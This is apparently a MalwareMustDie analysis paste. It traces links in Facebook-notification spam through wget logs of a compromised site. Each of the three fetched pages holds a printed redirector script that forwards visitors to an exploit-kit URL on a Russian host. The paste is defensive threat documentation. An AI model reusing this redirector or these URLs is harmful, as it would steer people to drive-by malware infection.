#MalwareMustDie - PD079-BHEK2-20121210-1

MalwareMustDie, Dec 10th, 2012
Facebook Notification Spam....

"NAME" hyperlink:
http://www.lincolnlutheran.org/mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE&

"GO TO FACEBOOK" & "UNSUBSCRIBE" hyperlink:
http://www.lincolnlutheran.org/mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC&

"SEE ALL NOTIFICATIONS" hyperlink:
http://www.lincolnlutheran.org/mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3&

----------------------------------------------------
--14:01:46--  http://www.lincolnlutheran.org/mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE&
          => `./sample'
Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
Caching www.lincolnlutheran.org => 67.222.108.81
Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
---request begin---
GET /mail.htm?BIX5MYP=X95RG45NH502A48920J6K&D5IS=IX2OLOH2BXWB4X&DM6=PCKKFX5TNF&0UPZJ4=ZX0L2OUF&OAJG8Q9=KAK0XV65C2F1G6W9I9PBV461O&I57G=R010XDKGQGJXDI&UI6=U6Z4ELZPRCW8FK0D15PUTV6&WPYXJ8=Y6C1G1BXWBE& HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: www.lincolnlutheran.org
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Mon, 10 Dec 2012 05:09:56 GMT
Server: Apache
Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
ETag: "dab820a-1a4-4d0077c43a8c0"
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1892 for persistent reuse.
Length: 420 [text/html]
100%[====================================>] 420           --.--K/s
14:01:46 (15.42 MB/s) - `./sample' saved [420/420]

$ cat sample

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2)
{document.location="h00p://francese.ru:8080/forum/links/column.php";}
</script>
</body>
</html>

--------------------------------------------------

--14:04:51--  http://www.lincolnlutheran.org/mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC&
          => `./sample'
Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
Caching www.lincolnlutheran.org => 67.222.108.81
Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
---request begin---
GET /mail.htm?76M3NZE=57G4J7J0OYU01KEEIKS&0XB=OAV4WB0ROY&CXCON4M=47WHG5NFKM&T6H=XAI98OH6W7UN6VB9FL0KE&TJG7Z5=GI8S46B0QCQ356&SSUD8=TOTGK4T9I9RH9AC& HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: www.lincolnlutheran.org
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Mon, 10 Dec 2012 05:13:01 GMT
Server: Apache
Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
ETag: "dab820a-1a4-4d0077c43a8c0"
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1892 for persistent reuse.
Length: 420 [text/html]
100%[====================================>] 420           --.--K/s
14:04:51 (15.93 MB/s) - `./sample' saved [420/420]

$ cat sample

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://francese.ru:8080/forum/links/column.php";}
</script>
</body>
</html>

------------------------------------------------------------

--14:08:06--  http://www.lincolnlutheran.org/mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3&
          => `./sample'
Resolving www.lincolnlutheran.org... seconds 0.00, 67.222.108.81
Caching www.lincolnlutheran.org => 67.222.108.81
Connecting to www.lincolnlutheran.org|67.222.108.81|:80... seconds 0.00, connected.
---request begin---
GET /mail.htm?HZVU0=XJ8X7J4OAJSGKKZ3&6EE9=AWPSVGXE&JFLF78=Q8I69F9PZ5CC9VZWNM3OFQ&7O7M0R=GROUPAPRMU6UNOHKF1XRI&XJYN=E0RMSOGDMEFFXDP&7HXRGG=G78E54JWXHS530L&AIR=3F7CWP85WM54Q3& HTTP/1.0
Referer: http://www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: www.lincolnlutheran.org
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Mon, 10 Dec 2012 05:16:16 GMT
Server: Apache
Last-Modified: Tue, 04 Dec 2012 14:14:35 GMT
ETag: "dab820a-1a4-4d0077c43a8c0"
Accept-Ranges: bytes
Content-Length: 420
Keep-Alive: timeout=10, max=10
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
Registered socket 1892 for persistent reuse.
Length: 420 [text/html]
100%[====================================>] 420           --.--K/s
14:08:06 (15.93 MB/s) - `./sample' saved [420/420]

$ cat sample

<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>  
<h1><b>Please wait a moment ... You will be forwarded... </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="http://francese.ru:8080/forum/links/column.php";}
</script>
</body>
</html>
-------
#MalwareMustDie